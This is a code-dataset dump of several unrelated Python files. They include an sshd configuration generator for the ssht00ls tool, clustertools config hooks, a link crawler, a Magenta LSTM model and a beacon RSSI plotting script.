'\\nAllowStreamLocalForwarding {}'.format(\"no\")\n\t\tconfiguration += '\\nGatewayPorts {}'.format(\"no\")\n\t\tconfiguration += '\\nPermitTTY {}'.format(\"yes\")\n\t\tfor listen_address in listen_addresses:\n\t\t\tconfiguration += f'\\nListenAddress {listen_address}'\n\n\t\t# auth keys.\n\t\tconfiguration += '\\nAuthorizedKeysFile {}'.format(\".ssh/authorized_keys\")\n\n\t\t# banner.\n\t\tconfiguration += '\\nBanner .ssh/banner'\n\n\t\t# per users.\n\t\tconfiguration += '\\nChallengeResponseAuthentication no'\n\t\tfor username, info in users.items():\n\t\t\tconfiguration += f'\\n# User: {username}'\n\n\t\t\t# ip filter.\t\n\t\t\tconfiguration += f'\\nMatch User {username}'\n\n\t\t\t# authentication by password.\n\t\t\tif info[\"password_authentication\"]:\n\t\t\t\tconfiguration += '\\n PasswordAuthentication yes'\n\t\t\t\tconfiguration += '\\n PermitEmptyPasswords no'\n\t\t\telse:\n\t\t\t\tconfiguration += '\\n PasswordAuthentication no'\n\t\t\t\tconfiguration += '\\n PermitEmptyPasswords no'\n\n\t\t\t# authentication by keys.\n\t\t\tif info[\"key_authentication\"]:\n\t\t\t\tconfiguration += '\\n PubkeyAuthentication {}'.format('yes')\n\t\t\telse:\n\t\t\t\tconfiguration += '\\n PubkeyAuthentication {}'.format('no')\n\n\n\t\t\t# chroot directory.\n\t\t\tif isinstance(info[\"chroot_directory\"], str):\n\t\t\t\tconfiguration += f'\\n ChrootDirectory {info[\"chroot_directory\"]}'\n\n\t\t\t# root permission.\n\t\t\tl = \"no\"\n\t\t\tif info[\"root_permissions\"] and info[\"key_authentication\"]: l = \"prohibit-password\"\n\t\t\telif info[\"root_permissions\"]: l = \"yes\"\n\t\t\tconfiguration += f'\\n PermitRootLogin {l}'\n\n\t\t\t# connection options.\n\t\t\tconfiguration += f'\\n X11Forwarding {self.__convert_boolean__(info[\"x11_forwarding\"])}'\n\t\t\tconfiguration += f'\\n AllowTcpForwarding {self.__convert_boolean__(info[\"tcp_forwarding\"])}'\n\n\t\t\t# default options.\n\t\t\tconfiguration += f'\\n PermitTunnel {self.__convert_boolean__(info[\"permit_tunnel\"])}'\n\t\t\tconfiguration += f'\\n AllowStreamLocalForwarding {self.__convert_boolean__(info[\"allow_stream_local_forwarding\"])}'\n\t\t\tconfiguration += f'\\n GatewayPorts {self.__convert_boolean__(info[\"gateway_ports\"])}'\n\t\t\tconfiguration += f'\\n PermitTTY yes'\n\t\t\t\n\t\t\t# check ip filter.\n\t\t\tif info[\"ip_filter\"]:\n\n\t\t\t\t# match verified ips.\n\t\t\t\tconfiguration += f'\\n Match User {username} Address {self.__sum_list__(info[\"allowed_ips\"])}'\n\n\t\t\t\t# check sftp only.\n\t\t\t\tif info[\"sftp_only\"]:\n\t\t\t\t\tconfiguration += '\\n ForceCommand internal-sftp'\n\n\t\t\t\t# shell access.\n\t\t\t\telse:\n\t\t\t\t\tconfiguration += '\\n ForceCommand bash .ssh/utils/handler'\n\n\t\t\t\t# match unverified ips.\n\t\t\t\tconfiguration += f'\\n Match User {username} Address *,!{self.__sum_list__(info[\"allowed_ips\"])}'\n\t\t\t\tconfiguration += f'\\n ForceCommand .ssh/utils/log.py \"Your ip address is not authorized.\" \"Authorize your ip address to access user [{username}].\"'\n\n\t\t\t# no ip filter.\n\t\t\telse:\n\n\t\t\t\t# check sftp only.\n\t\t\t\tif info[\"sftp_only\"]:\n\t\t\t\t\tconfiguration += '\\n ForceCommand internal-sftp'\n\n\t\t\t\t# shell access.\n\t\t\t\telse:\n\t\t\t\t\tconfiguration += '\\n ForceCommand bash .ssh/utils/handler'\n\n\t\t# match none authorized users.\n\t\t#if '*all*' not in list(users.keys()):\n\t\tconfiguration += f'\\nMatch User *,!{self.__sum_list__(list(users.keys()))}'\n\t\tconfiguration += '\\n PasswordAuthentication no'\n\t\tconfiguration += '\\n PermitEmptyPasswords no'\n\t\tconfiguration += '\\n PubkeyAuthentication no'\n\t\tconfiguration += f'\\n ForceCommand .ssh/utils/log.py \"You are not authorized to access user [$USER] over ssh.\"'\n\t\tconfiguration += \"\\n\"\n\n\t\t# save sshd.\n\t\tif save:\n\t\t\tfile = File(path='/tmp/sshd_config', data=configuration)\n\t\t\tfile.file_path.delete(forced=True, sudo=True)\n\t\t\tfile.save()\n\t\t\tfp = FilePath(f\"/etc/ssh/sshd_config\")\n\t\t\tfile.file_path.copy(fp.path, sudo=True)\n\t\t\tfp.permission.set(permission=644, sudo=True)\n\t\t\tfp.ownership.set(owner=\"root\", group=None, sudo=True)\n\t\t\tos.system(\"sudo systemctl restart ssh\")\n\t\t\tif not fp.exists(sudo=True):\n\t\t\t\treturn r3sponse.error(f\"Failed to save the sshd configuration.\")\n\n\t\t# success.\n\t\treturn r3sponse.success(\"Successfully created the sshd configuration.\", {\n\t\t\t\t\"sshd\":configuration,\n\t\t\t})\n\n\t\t#\n\t# system functions.\n\tdef __sum_list__(self, list):\n\t\treturn Array(path=False, array=list).string(joiner=',')\n\tdef __convert_boolean__(self, boolean):\n\t\tif boolean: return \"yes\"\n\t\telse: return \"no\"\n\tdef __check_user_items__(self, users):\n\n\t\t# iterate.\n\t\tfor username, info in users.items():\n\t\t\t\n\t\t\t# check options.\n\t\t\ttry: info[\"root_permissions\"]\n\t\t\texcept KeyError: info[\"root_permissions\"] = True\n\t\t\ttry: info[\"password_authentication\"]\n\t\t\texcept KeyError: info[\"password_authentication\"] = False\n\t\t\ttry: info[\"key_authentication\"]\n\t\t\texcept KeyError: info[\"key_authentication\"] = True\n\t\t\ttry: info[\"ip_filter\"]\n\t\t\texcept KeyError: info[\"ip_filter\"] = False\n\t\t\ttry: \n\t\t\t\tinfo[\"allowed_ips\"]\n\t\t\t\tif not isinstance(info[\"allowed_ips\"], list):\n\t\t\t\t\treturn r3sponse.error(f\"Invalid usage, parameter [users.{username}.allowed_ips] is supposed to be a list with allowed ip addresses.\")\n\t\t\texcept KeyError: info[\"allowed_ips\"] = []\n\t\t\ttry: info[\"sftp_only\"]\n\t\t\texcept KeyError: info[\"sftp_only\"] = False\n\t\t\ttry: info[\"chroot_directory\"]\n\t\t\texcept KeyError: info[\"chroot_directory\"] = None\n\t\t\ttry: info[\"x11_forwarding\"]\n\t\t\texcept KeyError: info[\"x11_forwarding\"] = False\n\t\t\ttry: info[\"tcp_forwarding\"]\n\t\t\texcept KeyError: info[\"tcp_forwarding\"] = False\n\n\t\t# response.\n\t\treturn r3sponse.success(\"Successfully checked the user items.\")\n\n\t\t#\n\tdef __check_utils_installed__(self, usernames=[]):\n\n\t\t# iterate.\n\t\tif isinstance(usernames, str): usernames = [usernames]\n\t\tto_install = []\n\t\tfor username in usernames:\n\t\t\t\n\t\t\t# non existant.\n\t\t\tfp = FilePath(f\"{syst3m.defaults.vars.homes}{username}/.ssh/utils/.version.py\")\n\t\t\tif not fp.exists(sudo=True): \n\t\t\t\tto_install.append(username)\n\n\t\t\t# check version.\n\t\t\telse: \n\t\t\t\tversion = utils.__execute__([\"sudo\", \"cat\", fp.path])\n\t\t\t\tgithub_version = utils.__execute__([\"curl\", \"https://raw.githubusercontent.com/vandenberghinc/ssht00ls/master/ssht00ls/classes/utils/.version.py?raw=true\"])\n\t\t\t\tif str(version) != str(github_version):\n\t\t\t\t\tto_install.append(username)\n\n\t\t# install.\n\t\tif len(to_install) > 0:\n\t\t\tresponse = self.__install_utils__(to_install)\n\t\t\tif response[\"error\"] != None: return response\n\n\t\t# success.\n\t\treturn r3sponse.success(\"Successfully verified the ssht00ls utils installation.\")\n\n\t\t#\n\tdef __install_utils__(self, usernames=[]):\n\n\t\t# checks.\n\t\tif isinstance(usernames, str): usernames = [usernames]\n\t\tif len(usernames) == 0: \n\t\t\treturn r3sponse.error(\"No usernames specified.\")\n\n\t\t# create tmp lib.\n\t\tutils_lib = gfp.clean(path=f\"{SOURCE_PATH}/classes/utils/\")\n\t\tutils_tmp = \"/tmp/utils/\"\n\t\tif not os.path.exists(utils_lib):\n\t\t\traise ValueError(f\"ssht00ls library [{utils_lib}] does not exist.\")\n\t\tos.system(f\"rsync -az {utils_lib} {utils_tmp} --delete\")\n\t\tos.system(f\"rm -fr {utils_tmp}/__pycache__\")\n\t\tos.system(f\"rm -fr {utils_tmp}/__init__.py\")\n\t\tos.system(f\"rm -fr {utils_tmp}/isdir.py\")\n\t\tos.system(f\"rm -fr {utils_tmp}/size.py\")\n\t\tif not Files.exists(utils_tmp):\n\t\t\treturn r3sponse.error(\"Failed to install the ssht00ls utils (#2).\")\n\n\t\t# iterate.\n\t\tfor username in usernames:\n\n\t\t\t# check if ssh is correctly installed.\n\t\t\tresponse = installation.check_installed(username=username)\n\n\t\t\t# install the ssh correctly for the specified user.\n\t\t\tif response[\"error\"] != None:\n\t\t\t\tresponse = installation.install(username=username)\n\t\t\t\tif response[\"error\"] != None: return response\n\n\t\t\t# copy.\n\t\t\tfp = FilePath(f\"{syst3m.defaults.vars.homes}{username}/.ssh/utils/\")\n\t\t\tos.system(f\"sudo rm -fr {fp.path}\")\n\t\t\tos.system(f\"sudo rsync -az {utils_tmp} {fp.path} --delete\")\n\t\t\tfp.ownership.set(owner=username, group=None, sudo=True, recursive=True)\n\t\t\tfp.permission.set(permission=755, recursive=True, sudo=True)\n\t\t\tif not fp.exists(sudo=True):\n\t\t\t\treturn r3sponse.error(\"Failed to install the ssht00ls utils (#3).\")\n\n\t\t# success.\n\t\treturn r3sponse.success(\"Successfully installed the ssht00ls utils.\")\n\n\t\t#\n\tdef __install_banner__(self, banner=\"\", usernames=[]):\n\n\t\t# checks.\n\t\tif isinstance(usernames, str): usernames = [usernames]\n\t\tif len(usernames) == 0: \n\t\t\treturn r3sponse.error(\"No usernames specified.\")\n\n\t\t# save banner.\n\t\tfile = File(path='/tmp/banner', data=banner)\n\t\tfile.file_path.delete(forced=True, sudo=True)\n\t\tfile.save()\n\n\t\t# iterate.\n\t\tfor username in usernames:\n\t\t\tfp = FilePath(f\"/{syst3m.defaults.vars.homes}{username}/.ssh/banner\")\n\t\t\tfile.file_path.copy(fp.path, sudo=True)\n\t\t\tfp.permission.set(permission=755, sudo=True)\n\t\t\tfp.ownership.set(owner=username, group=None, sudo=True)\n\t\t\tif not fp.exists(sudo=True):\n\t\t\t\treturn r3sponse.error(f\"Failed to install the banner for user [{username}].\")\n\n\t\t# success.\n\t\treturn r3sponse.success(\"Successfully installed the banner.\")\n\n\t\t#\n\t#\n\n# Initialized classes.\nsshd = SSHD()\n\n\n\n\n\n\n","sub_path":"ssht00ls/.legacy/3.14.0/classes/sshd/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"401023112","text":"from vt_manager.communication.sfa.rspecs.elements.element import Element \nfrom vt_manager.communication.sfa.rspecs.elements.pltag import PLTag\n\nclass SFAv1PLTag:\n @staticmethod\n def add_pl_tag(xml, name, value):\n for pl_tag in pl_tags:\n pl_tag_elem = xml.add_element(name)\n pl_tag_elem.set_text(value)\n \n @staticmethod\n def get_pl_tags(xml, ignore=[]):\n pl_tags = []\n for elem in xml.iterchildren():\n if elem.tag not in ignore:\n pl_tag = PLTag({'tagname': elem.tag, 'value': elem.text})\n pl_tags.append(pl_tag) \n return pl_tags\n\n","sub_path":"vt_manager/src/python/vt_manager/communication/sfa/rspecs/elements/versions/sfav1PLTag.py","file_name":"sfav1PLTag.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"616238270","text":"from __future__ import annotations\n\nimport re\nimport time\nfrom collections import defaultdict\nfrom functools import wraps\nfrom typing import Any, Callable, Dict, Literal, TYPE_CHECKING, TypeVar, Union, Type\n\nif TYPE_CHECKING:\n from clustertools.file_objects.configs.global_config import GlobalConfig\n from clustertools.file_objects.configs.project_config import ProjectConfig\n from clustertools.shared.environ import PseudoEnviron\n from clustertools.shared.object_monitors import MonitoredEnviron, MonitoredList\n from clustertools.shared.typing import (_BoundHook,\n _CheckedVal,\n _Config,\n _Hook,\n _UncheckedVal,\n EmailAddress,\n OneOrMore,\n WallTimeStr)\n\n\nEMAIL_PATTERN = re.compile(r'^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$')\n\n\n########################################################################\n# CONFIG HOOK HELPERS #\n########################################################################\n# _T = TypeVar('_T')\n# class SimpleDefaultDict(dict):\n# # ADD DOCSTRING\n# \"\"\"\n# Similar to collections.defaultdict, but doesn't add missing keys.\n# Accepts an additional keyword-only argument 'default' that may\n# be either a default value to return for missing keys, or a\n# callable that accepts the missing key as an argument.\n#\n# Used here to provide a dummy callable hook for config fields that\n# don't require any special validation or extra work\n# \"\"\"\n# def __init__(\n# self,\n# *arg,\n# default: Union[_T, Callable[..., _T]] = None,\n# **kwargs\n# ) -> None:\n# # ADD DOCSTRING\n# if len(arg) > 1:\n# raise TypeError(\n# f\"{self.__class__.__name__} expected at most 1 argument, got \"\n# f\"{len(arg)}\"\n# )\n# super().__init__(*arg, **kwargs)\n# if callable(default):\n# self.default = default\n# else:\n# self.default = lambda key: default\n#\n# def __missing__(self, key: Any) -> _T:\n# return self.default(key)\n#\n#\n# def dummy_hook(inst: _Config, val: _T) -> _T:\n# return val\n\n\nclass ParrotDict(dict):\n def __missing__(self, key):\n return key\n\n\ndef bindable(\n func: _Hook[[_Config, _UncheckedVal], _CheckedVal]\n) -> _BoundHook[[_UncheckedVal], _CheckedVal]:\n # ADD DOCSTRING - decorates a function 'func', allowing it to be\n # bound to an object 'instance' at runtime and optionally added as\n # an instance method\n @wraps(func)\n def bind(instance: _Config) -> _BoundHook:\n return func.__get__(instance)\n\n return bind\n\n\n# def enforce_value_type(value: Any, _type: OneOrMore[Type]) -> None:\n# if not isinstance(value, _type):\n# if hasattr(_type, '__iter__'):\n# assert len(_type) == 2 # no fields should accept more than 2 types\n# t = f\"either '{_type[0].__name__}' or '{_type[1].__name__}'\"\n# else:\n# t = f\"'{_type.__name__}'\"\n# raise TypeError(\n# f\"Type of assigned value must be {t}. Received \"\n# f\"'{value.__class__.__name__}'\"\n# )\n\n\n########################################################################\n# TYPE CONVERTERS #\n########################################################################\n # Python types -> str #\ndef environ_to_str(environ: Union[Dict[str, str], PseudoEnviron]) -> str:\n str_fmt = '\\n'.join('='.join(item) for item in environ.items())\n if str_fmt != '':\n str_fmt = '\\n' + str_fmt\n return str_fmt\n\n\nto_str_funcs = {\n bool: lambda b: str(b).lower(),\n MonitoredList: lambda l: ','.join(l),\n MonitoredEnviron: environ_to_str\n}\nto_str_funcs = defaultdict(lambda: str, to_str_funcs)\n\n\ndef type_to_str(value: Any) -> str:\n return to_str_funcs[type(value)](value)\n\n\n # str -> Python types #\n@bindable\ndef str_to_environ(inst: _Config, environ_str: str) -> MonitoredEnviron:\n keys_vals = map(lambda x: x.split('='), environ_str.strip().splitlines())\n env_dict = {k.strip(): v.strip() for k, v in keys_vals}\n validate_item_hook = inst._object_validate_hooks['environ']\n post_update_hook = inst._object_post_update_hooks['environ']\n return MonitoredEnviron(initial_env=dict(),\n custom_vars=env_dict,\n validate_item_hook=validate_item_hook,\n post_update_hook=post_update_hook)\n\n\n@bindable\ndef str_to_modules(inst: _Config, modules_str: str) -> MonitoredList:\n modules_list = [m.strip() for m in modules_str.strip().split(',')]\n validate_item_hook = inst._object_validate_hooks['modules']\n post_update_hook = inst._object_post_update_hooks['modules']\n return MonitoredList(modules_list,\n validate_item_hook=validate_item_hook,\n post_update_hook=post_update_hook)\n\n\n@bindable\ndef str_to_email_list(inst: _Config, email_str: str) -> MonitoredList:\n email_list = [m.strip() for m in email_str.strip().split(',')]\n validate_item_hook = inst._object_validate_hooks['email']\n post_update_hook = inst._object_post_update_hooks['email']\n return MonitoredList(email_list,\n validate_item_hook=validate_item_hook,\n post_update_hook=post_update_hook)\n\n\nto_type_funcs = {\n 'environ': str_to_environ,\n 'modules': str_to_modules,\n 'email': str_to_email_list\n}\n\n@bindable\ndef str_to_type(\n inst: _Config,\n key: str,\n value: str\n) -> Union[str, bool, int, MonitoredEnviron[str, str], MonitoredList[str]]:\n if value == 'true':\n return True\n elif value == 'false':\n return False\n elif value.isdigit():\n return int(value)\n else:\n try:\n return inst._to_type_funcs[key]\n except KeyError:\n # then it must be a str\n return value\n\n\n########################################################################\n# MONITORED OBJECT HOOKS #\n########################################################################\n # validate_item_hooks #\ndef validate_email(email: str) -> None:\n # used by itself when individual items added to/replaced in\n # email_list and as part of 'validate_email_list' when entire field\n # is replaced\n\n is_valid = bool(email == 'INFER' or EMAIL_PATTERN.match(email))\n if not is_valid:\n raise ValueError(\n f\"{email} does not appear to be formatted as a valid email \"\n f\"address (you can pass 'infer' to use the default email address \"\n f\"for your account)\"\n )\n\n\nBASE_OBJECT_VALIDATE_HOOKS = {'email': validate_email}\n\n\n # post_update_hooks #\n@bindable\ndef environ_post_update_global(inst: GlobalConfig) -> None:\n default_environ = inst._config.project_defaults.runtime_environment.environ\n environ_str = environ_to_str(default_environ)\n inst._configparser.set('project_defaults.runtime_environment',\n 'environ',\n environ_str)\n inst.write_config_file()\n\n\n@bindable\ndef environ_post_update_project(inst: ProjectConfig) -> None:\n environ_str = environ_to_str(inst._config.runtime_environment.environ)\n inst._configparser.set('runtime_environment', 'environ', environ_str)\n inst.write_config_file()\n\n\n@bindable\ndef modules_post_update_global(inst: GlobalConfig) -> None:\n modules_str = ','.join(inst._config.project_defaults.runtime_environment.modules)\n inst._configparser.set('project_defaults.runtime_environment',\n 'modules',\n modules_str)\n inst.write_config_file()\n\n\n@bindable\ndef modules_post_update_project(inst: ProjectConfig) -> None:\n modules_str = ','.join(inst._config.runtime_environment.modules)\n inst._configparser.set('runtime_environment', 'modules', modules_str)\n inst.write_config_file()\n\n\n@bindable\ndef email_post_update_global(inst: GlobalConfig) -> None:\n emails_str = ','.join(inst._config.project_defaults.notifications.email)\n inst._configparser.set('project_defaults.notifications',\n 'email',\n emails_str)\n inst.write_config_file()\n\n\n@bindable\ndef email_post_update_project(inst: ProjectConfig) -> None:\n emails_str = ','.join(inst._config.notifications.email)\n inst._configparser.set('notifications', 'email', emails_str)\n inst.write_config_file()\n\n\nGLOBAL_OBJECT_POST_UPDATE_HOOKS = {\n 'environ': environ_post_update_global,\n 'modules': modules_post_update_global,\n 'email': email_post_update_global\n}\n\n\nPROJECT_OBJECT_POST_UPDATE_HOOKS = {\n 'environ': environ_post_update_project,\n 'modules': modules_post_update_project,\n 'email': email_post_update_project\n}\n\n\n########################################################################\n# SHARED HOOKS (BaseConfig) #\n########################################################################\n@bindable\ndef validate_job_basename(inst: _Config, new_basename: str) -> str:\n # TODO: should logic for preventing changes to attribute when\n # submission/jobs in progress be handled here or on Project object?\n if len(new_basename) > 15:\n raise ValueError(\"Job names may be up to 15 characters in length\")\n elif not new_basename[0].isalpha():\n raise ValueError(\n \"Job names must start with an alphabetic character ([a-zA-Z])\"\n )\n elif re.search('\\s', new_basename) is not None:\n raise ValueError(\"Job names may not contain whitespace\")\n return new_basename\n\n\n@bindable\ndef validate_walltime_str(inst: _Config, walltime_str: str) -> WallTimeStr:\n try:\n time.strptime(walltime_str, '%H:%M:%S')\n except ValueError:\n try:\n time.strptime(walltime_str, '%M:%S')\n except ValueError:\n raise ValueError(\n \"Malformed string value for 'wall_time'. Format should be \"\n \"'HH:MM:SS', or 'MM:SS' if requesting < 1 hour\"\n )\n return walltime_str\n\n\n@bindable\ndef monitor_modules(\n inst: _Config,\n new_modules: OneOrMore[str]\n) -> MonitoredList:\n # called when config field is *replaced*, rather than edited\n if isinstance(new_modules, str):\n new_modules = [new_modules]\n else:\n new_modules = list(new_modules)\n if isinstance(inst, GlobalConfig):\n post_update_hook = modules_post_update_global\n else:\n post_update_hook = modules_post_update_project\n return MonitoredList(new_modules,\n validate_item_hook=None,\n post_update_hook=post_update_hook(inst=inst))\n\n\n@bindable\ndef monitor_environ(inst: _Config, environ: Dict[str, str]) -> MonitoredEnviron:\n # called when setting the environ config field, rather than updating\n # individual variables\n if not all(isinstance(i, str) for i in sum(environ.items(), ())):\n raise TypeError(\"All keys and values in environ mapping must be 'str'\")\n if isinstance(inst, GlobalConfig):\n post_update_hook = environ_post_update_global\n else:\n post_update_hook = environ_post_update_project\n return MonitoredEnviron(initial_env=dict(),\n custom_vars=environ,\n validate_item_hook=None,\n post_update_hook=post_update_hook(inst=inst))\n\n\n@bindable\ndef monitor_email(\n inst: _Config,\n new_emails: OneOrMore[str]\n) -> MonitoredList[EmailAddress]:\n if isinstance(new_emails, str):\n new_emails = [new_emails]\n else:\n new_emails = list(new_emails)\n for eml in new_emails:\n validate_email(eml)\n if isinstance(inst, GlobalConfig):\n post_update_hook = email_post_update_global\n else:\n post_update_hook = email_post_update_project\n return MonitoredList(new_emails,\n validate_item_hook=validate_email,\n post_update_hook=post_update_hook(inst=inst))\n\n\nBASE_CONFIG_UPDATE_HOOKS = {\n 'job_basename': validate_job_basename,\n 'wall_time': validate_walltime_str,\n 'modules': monitor_modules,\n 'environ': monitor_environ,\n 'email': monitor_email\n}\n\n\n########################################################################\n# GLOBAL CONFIG HOOKS #\n########################################################################\n@bindable\ndef move_projects(inst: GlobalConfig, new_dir: str) -> str:\n # TODO: write me... this is a tricky one. will need to\n # inst._cluster.check_output() a 'mv' command for each project in\n # the old project_dir. Also should confirm\n # inst._cluster.is_dir(PurePosixPath(new_dir)) first\n # enforce_value_type(value=new_dir, _type=str)\n raise NotImplementedError(\"Moving project directory is not yet supported\")\n\n\n# @bindable\n# def launch_in_project_dir_hook(inst: GlobalConfig, pref: bool) -> None:\n# enforce_value_type(value=pref, _type=bool)\n\n\n@bindable\ndef validate_shell_executable(inst: GlobalConfig, new_exe: str) -> str:\n # update cluster object, which conveniently validates executable\n # enforce_value_type(value=new_exe, _type=str)\n inst._cluster.executable = new_exe\n return new_exe\n\n\n# @bindable\n# def confirm_project_deletion_hook(inst: GlobalConfig, pref: bool) -> None:\n# enforce_value_type(value=pref, _type=bool)\n\n\n@bindable\ndef check_default_prefer_value(\n inst: GlobalConfig,\n pref: Literal['local', 'remote', 'recent']\n) -> None:\n if pref not in ('local', 'remote', 'recent'):\n raise ValueError(\n \"default file syncing behavior must be either 'local', 'remote', \"\n \"or 'recent'\"\n )\n\n\nGLOBAL_CONFIG_UPDATE_HOOKS = {\n 'project_dir': move_projects,\n 'executable': validate_shell_executable,\n 'default_prefer': check_default_prefer_value,\n}\n\n\n########################################################################\n# PROJECT CONFIG HOOKS #\n########################################################################\n@bindable\ndef update_config_from_global(inst: ProjectConfig, pref: bool) -> bool:\n # TODO: write me. This one's going to take some pre-planning &\n # coordinating between ProjectConfig, Project, MonitoredEnviron,\n # TrackedAttrConfig, etc. classes\n ...\n return pref\n\n\n@bindable\ndef init_project_job_monitor(inst: ProjectConfig, pref: bool) -> bool:\n # initializes a monitor Job object on the associated Project object\n # when auto_monitor_jobs is set to True, removes it when set to False\n if pref and not inst._config.monitoring.auto_monitor_jobs:\n inst._project._init_monitor()\n elif not pref:\n inst._project._monitor_script = inst._project._monitor = None\n return pref\n\n\nPROJECT_CONFIG_UPDATE_HOOKS = {\n 'auto_monitor_jobs': init_project_job_monitor\n}\n","sub_path":"clustertools/file_objects/configs/config_helpers.py","file_name":"config_helpers.py","file_ext":"py","file_size_in_byte":15438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"315055910","text":"def f(lst,arr,dex):\n if dex==1:\n\n num=int(\"\".join(lst))\n while num!=1:\n\n\n if num%2==1:\n return\n else:\n num=num/2\n\n return True\n else:\n for i in range(0,dex):\n\n temp=lst[dex-1]\n lst[dex-1]=lst[i]\n lst[i]=temp\n if f(lst,arr,dex-1):\n return True\n\n\n\n temp = lst[dex - 1]\n lst[dex - 1] = lst[i]\n lst[i] = temp\n\n\n\n\n\n\nnum=input()\nlst=list(num)\narr=[]\nres=[]\nnum=int(num)\nif num==1:\n print('true')\nelse:\n if f(lst,arr,len(lst)):\n print('true')\n else:\n print('false')\n\n","sub_path":"Code/CodeRecords/2529/60644/245964.py","file_name":"245964.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"638388914","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\nimport datetime\nimport random\n\npages = set()\nrandom.seed(datetime.datetime.now())\n\ndef get_internal_links(bs_object, include_url):\n internal_links = []\n for link in bs_object.findAll(\"a\", href=re.compile(\"^(/|.*\" + include_url + \")\")):\n if link.attrs['href'] is not None:\n if link.attrs['href'] not in internal_links:\n internal_links.append(link.attrs['href'])\n \n return internal_links\n\ndef get_external_links(bs_object, exclude_url):\n external_links = []\n for link in bs_object.findAll(\"a\", href=re.compile(\"^(http|www)((?!\" + exclude_url + \").)*$\")):\n if link.attrs['href'] is not None:\n if link.attrs['href'] not in external_links:\n external_links.append(link.attrs['href'])\n\n return external_links\n\ndef split_address(address):\n address_parts = address.replace(\"http://\", \"\").split(\"/\")\n return address_parts\n\ndef get_random_external_link(starting_page):\n html = urlopen(starting_page)\n bs_object = BeautifulSoup(html, \"html.parser\")\n external_links = get_external_links(bs_object, split_address(starting_page)[0])\n if len(external_links) == 0:\n internal_links = get_internal_links(starting_page)\n return get_external_links(internal_links[random.randint(0 , len(internal_links) - 1)])\n else:\n return external_links[random.randint(0, len(external_links) - 1)]\n\ndef follow_external_only(starting_site):\n external_link = get_random_external_link(starting_site)\n print(\"Random external link is: \" + external_link)\n follow_external_only(external_link)\n\n#follow_external_only(\"http://www.oreilly.com\")\n\nall_external_links = set()\nall_interanl_links = set()\n\ndef get_all_external_links(site_url):\n html = urlopen(site_url)\n bs_object = BeautifulSoup(html, \"html.parser\")\n internal_links = get_internal_links(bs_object, split_address(domain)[0])\n external_links = get_external_links(bs_object, split_address(domain)[0])\n\n for link in external_links:\n if link not in all_external_links:\n all_external_links.add(link)\n print(link)\n\n for link in internal_links:\n if link == \"/\":\n link = domain\n elif link[0:2] == \"//\":\n link = \"http:\" + link\n elif link[0:1] == \"/\":\n link = domain + link\n\ndomain = \"http://en.wikipedia.org/wiki/Kevin_Bacon\"#\"http://www.oreilly.com\"\nget_all_external_links(domain) \n\n","sub_path":"crawler/Chap3/web_scraping.py","file_name":"web_scraping.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"264598004","text":"from tensorflow.compat.v1 import keras\nfrom tensorflow.compat.v1.keras import layers\n\nBASIC_DEFAULT_MIN_NOTE = 48\nBASIC_DEFAULT_MAX_NOTE = 84\n# dimensionality of one event\nBASIC_EVENT_DIM = BASIC_DEFAULT_MAX_NOTE - BASIC_DEFAULT_MIN_NOTE + 2 # all note on events, note off, rest\nLOOKBACK_RNN_INPUT_EVENT_DIM = 120\n\n\ndef get_simple_rnn_model(event_dim, is_Training, temperature=1):\n # input_shape: (None, : different sequence lengths (per batch; every sequence in one batch does have the same dimension)\n # EVENT_DIM) : dimensionality of one event\n layer_one_args = {'units': 128,\n 'input_shape': (None, event_dim),\n 'return_sequences': True,\n 'dropout': 0.5,\n 'recurrent_dropout': 0.5,\n }\n layer_two_args = {'units': 128,\n 'return_sequences': True,\n 'dropout': 0.5,\n 'recurrent_dropout': 0.5,\n }\n # for generating\n if not is_Training:\n # we predict one by one event\n layer_one_args['input_shape'] = (1, event_dim)\n layer_one_args['batch_input_shape'] = (1, 1, event_dim)\n layer_one_args['stateful'] = True\n layer_two_args['stateful'] = True\n\n model = keras.Sequential()\n model.add(layers.LSTM(**layer_one_args))\n # second LSTM layer\n model.add(layers.LSTM(**layer_two_args))\n model.add(layers.Lambda(lambda x: x/temperature))\n model.add(layers.Dense(units=event_dim, activation='softmax'))\n\n return model\n","sub_path":"magenta/models/my_rnn/my_simple_rnn_model.py","file_name":"my_simple_rnn_model.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"540065786","text":"from matplotlib import pyplot as plt \nimport json\nimport os\nimport operator\n\nfilterMethod = \"kalman\"\n\ndata_dir = os.getcwd() + \"/beacon-all-points-\" + filterMethod + \"/\"\nf = open(os.path.join(data_dir, \"beacon.json\"),\"r\")\ndata = json.load(f)\nf.close()\n\nsave_path = os.getcwd() + \"/Graphs/rssi_vs_distance_reported/\"\nif not(os.path.isdir(save_path)) : \n\tos.mkdir(save_path)\n\ndistance = {}\nrssi = {}\nnoOfBeacons = 10\n\nfor elem in data[\"beacon\"]:\n\tfor values in elem[\"beaconData\"]:\n\t\tif values[\"id3\"] in distance :\n\t\t\tdistance[values[\"id3\"]].append(values[\"distance\"])\n\t\telse :\n\t\t\tdistance[values[\"id3\"]] = [values[\"distance\"]]\n\n\t\tif values[\"id3\"] in rssi :\n\t\t\trssi[values[\"id3\"]].append(values[\"rssi\"])\n\t\telse :\n\t\t\trssi[values[\"id3\"]] = [values[\"rssi\"]]\n\t\t\nfor beaconNo in range(1, noOfBeacons+1) :\n\tplt.figure(figsize=(16, 10))\n\tplt.title(\"Variation in RSSI vs reported distance from beacon \" + str(beaconNo)) \n\tplt.xlabel(\"Distance in meters\") \n\tplt.ylabel(\"RSSI in dBm\") \n\tsort_axis = operator.itemgetter(0)\n\tsorted_zip = sorted(zip(distance[beaconNo], rssi[beaconNo]), key=sort_axis)\n\tsort_distance, sort_rssi = zip(*sorted_zip)\n\tplt.plot(sort_distance, sort_rssi, 